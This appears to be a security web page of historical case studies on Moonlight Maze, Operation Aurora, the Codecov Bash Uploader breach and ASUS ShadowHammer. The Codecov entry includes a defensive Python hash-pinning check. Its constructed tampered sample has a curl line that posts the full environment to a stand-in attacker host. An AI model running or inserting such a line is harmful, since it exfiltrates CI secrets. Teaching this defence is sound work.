Case Studies: Historical Grid
Moonlight Maze (1996–1999)
The First Nation-State Hunt: Years of Stealthy Exfiltration That Seeded the Turla Lineage
Between 1996 and 1999, U.S. investigators traced a sprawling intrusion set — later codenamed Moonlight Maze — siphoning military, NASA, and university research data to Russia-linked infrastructure through a web of compromised relay hosts. It was among the first cyber-espionage cases to demand systematic log correlation, honeypots, and cross-agency forensics, and researchers later tied its LOKI2-based tooling to the code lineage behind Turla and today's Kazuar botnet. The case proved that patient, low-and-slow state intrusions could evade detection for years — the very playbook Secret Blizzard still runs three decades later.
Operation Aurora (2009–2010)
An Internet Explorer Zero-Day Opens Google, Adobe, and Dozens More to Persistent Theft
Disclosed by Google in January 2010, Operation Aurora was a China-linked campaign that weaponized an Internet Explorer zero-day (CVE-2010-0249) to breach at least 20 major companies and steal source code and intellectual property. Forensic teams reconstructed the intrusions through memory analysis, encrypted C2 traffic, and the IE use-after-free exploit chain. The case pushed the industry toward threat-intelligence sharing and made "advanced persistent threat" a board-level term — and that same CVE-2010-0249 resurfaced in CISA's May 20, 2026 KEV batch, proving old exploits never truly die.
Codecov Bash Uploader Breach (2021)
A Single Tampered CI Script Quietly Drains Secrets From Thousands of Build Pipelines for Two Months
In April 2021, Codecov disclosed that an attacker had used a flaw in its Docker image build to extract credentials and modify the widely used Bash Uploader script. For roughly two months, the altered script silently exfiltrated environment variables — tokens, keys, and credentials — from customers' CI/CD pipelines to an attacker-controlled server. Investigators reconstructed the intrusion via Git history of the uploader and outbound traffic analysis, and the case became the textbook example of why every secret exposed to a build runner must be treated as compromised.
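The defensive counterpart to this case is an integrity gate: pin the hash of any helper script a pipeline fetches and refuse to run it on mismatch. The example below is added here and is not Codecov's code; the script bodies, the pinned hash and the host names are constructed stand-ins.

```python
"""Integrity gate for a fetched CI helper script (added example, not Codecov's code).

Before a pipeline executes a downloaded uploader, compare it to a pinned SHA-256
and, on mismatch, surface the lines that differ from the last known-good copy.
Both script bodies below are constructed samples, not the real Bash Uploader.
"""
import difflib
import hashlib

# Constructed known-good script body (stand-in for the vetted uploader).
KNOWN_GOOD = """#!/usr/bin/env bash
set -euo pipefail
REPORT="${1:-coverage.xml}"
curl -sS -X POST --data-binary @"$REPORT" "https://uploader.example/upload"
"""

# Constructed tampered copy: one appended line ships the whole environment,
# and therefore every secret the runner holds, to an outside host.
TAMPERED = KNOWN_GOOD + 'curl -sm 0.5 -d "$(env)" http://attacker.invalid/upload\n'


def sha256_hex(text: str) -> str:
    """Hex SHA-256 of the script text, the value a team commits as its pin."""
    return hashlib.sha256(text.encode()).hexdigest()


# The pin that would live next to the pipeline definition (constructed here).
PINNED_SHA256 = sha256_hex(KNOWN_GOOD)


def verify_script(candidate: str, pinned: str, known_good: str) -> dict:
    """Return a verdict: ok=True when the hash matches the pin; otherwise list the
    lines added to or removed from the known-good copy so the change is visible."""
    actual = sha256_hex(candidate)
    if actual == pinned:
        return {"ok": True, "sha256": actual, "added": [], "removed": []}
    diff = list(difflib.unified_diff(known_good.splitlines(),
                                     candidate.splitlines(), lineterm="", n=0))
    added = [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]
    removed = [l[1:] for l in diff if l.startswith("-") and not l.startswith("---")]
    return {"ok": False, "sha256": actual, "added": added, "removed": removed}


if __name__ == "__main__":
    for label, body in (("known-good", KNOWN_GOOD), ("tampered", TAMPERED)):
        verdict = verify_script(body, PINNED_SHA256, KNOWN_GOOD)
        print(label, "ok" if verdict["ok"] else "REJECT", verdict["added"])
```

A pipeline would fail the job on `ok=False` rather than execute the script, and the `added` lines give responders the exact injected content to hunt for.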
ASUS ShadowHammer (2019)
Stolen Code-Signing Certificates Push a Backdoored Live Update to a Million Machines — Aimed at 600
Kaspersky's Operation ShadowHammer revealed that attackers had trojanized the ASUS Live Update utility and signed it with legitimate, stolen ASUS code-signing certificates, distributing it through official channels to roughly one million users. The implant checked each host's MAC address against a hardcoded list of about 600 targets before fetching a second-stage payload. Forensic teams matched the malicious binaries by certificate serial and timestamp — an enduring lesson in the danger of trusted signatures and surgically targeted supply-chain delivery.